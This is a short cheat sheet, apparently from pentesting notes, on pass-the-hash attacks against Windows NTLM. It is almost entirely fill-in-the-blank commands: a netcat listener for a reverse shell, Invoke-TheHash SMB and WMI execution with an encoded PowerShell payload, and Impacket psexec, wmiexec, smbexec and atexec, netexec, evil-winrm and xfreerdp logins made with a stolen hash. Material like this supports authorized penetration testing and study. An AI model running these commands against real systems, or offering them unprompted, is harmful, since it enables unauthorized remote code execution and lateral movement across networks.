PRIMARY CATEGORY → NTLM
Passing the Hash
Invoke-TheHash
Reverse Shell
- Import the Powershell Module
Import-Module .\Invoke-TheHash.psm1- Set a Listenting Port using Netcat
rlwrap -CaR nc -nlvp 443Invoke-SMBExec
Invoke-SMBExec -Target <TARGET> -Domain <DOMAIN> -Username <USERNAME> -Hash <NTLM_HASH> -Command "Powershell.exe -EncodedCommand <BASE64_COMMAND>"Invoke-WMIExec
Invoke-WMIExec -Target <TARGET> -Domain <DOMAIN> -Username <USERNAME> -Hash <NTLM_HASH> -Command "Powershell.exe -EncodedCommand <BASE64_COMMAND>"Impacket
PSExec.py
psexec.py -hashes :<NTLM_HASH> <DOMAIN>/<USERNAME>@<TARGET> <COMMAND> # Default Command → cmd.exeWMIExec.py
wmiexec.py -hashes :<NTLM_HASH> <DOMAIN>/<USERNAME>@<TARGET> <COMMAND> # Default Command → Semi-Interactive ShellSMBExec.py
smbexec.py -hashes :<NTLM_HASH> <DOMAIN>/<USERNAME>@<TARGET> <COMMAND>ATExec.py
atexec.py -hashes :<NTLM_HASH> <DOMAIN>/<USERNAME>@<TARGET> <COMMAND>Netexec
nxc smb <TARGET> --username '<USERNAME>' --hash <NTLM_HASH> -x <COMMAND>Evil-WinRM
evil-winrm --user <USERNAME>@<DOMAIN_OR_WORKGROUP> --hash <NTLM_HASH> --ip <TARGET>XFreeRDP
xfreerdp /u:<USERNAME> /pth:<NTLM_HASH> /v:<TARGET> /cert:ignoreRestricted Admin Mode
Zoom In
See here